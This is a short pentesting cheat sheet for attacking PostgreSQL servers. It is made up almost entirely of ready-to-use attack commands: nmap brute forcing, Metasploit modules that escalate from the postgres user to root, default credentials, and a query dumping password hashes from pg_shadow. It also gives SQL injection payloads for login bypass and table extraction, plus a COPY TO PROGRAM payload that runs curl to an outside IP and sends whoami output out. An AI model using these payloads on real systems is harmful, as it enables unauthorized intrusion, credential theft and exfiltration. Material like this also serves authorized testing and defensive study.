
5432 - Pentesting psql

PostgreSQL is an open-source relational database management system (RDBMS) that is widely used for managing and storing data. It is known for its reliability, stability, and robust feature set, and it is used by organizations of all sizes, from small startups to large enterprise businesses.

nmap

sudo nmap -sV -sC -p 5432 $IP
nmap -p 5432 --script=pgsql-brute $IP

metasploit

metasploit - version

use auxiliary/scanner/postgres/postgres_version
use auxiliary/scanner/postgres/postgres_login
metasploit - postgres - 8.3.1 + udev_netlink
use exploit/linux/postgres/postgres_payload
|-> getuid => postgres 
use exploit/linux/local/udev_netlink
|-> getuid => root

Users

user pass
postgres postgres
postgres password

Connect (local)

psql -U postgres

Connect (remote)

psql -h $IP -U postgres -W postgres
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W postgres <database>
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # List users and their roles

# Get current user
Select user;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

# List databases
SELECT datname FROM pg_database;

# Read credentials (usernames + password hashes); pg_shadow is readable only by superusers
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show extensions available on an AWS RDS instance (rds.extensions is RDS-specific, not a list of installed extensions)
SHOW rds.extensions;

# Show the psql client's command history
\s

SQL Injection

basic

x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
list of tables
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x
list of columns
x'; SELECT cast(cast(json_agg(column_name) as varchar) as boolean) FROM information_schema.columns where table_name = 'users'; -- x
RCE (COPY ... TO PROGRAM runs only for superusers or members of pg_execute_server_program; application roles should hold neither)
x'; copy (SELECT '') to program 'curl http://10.10.14.13?f=`whoami|base64`'-- x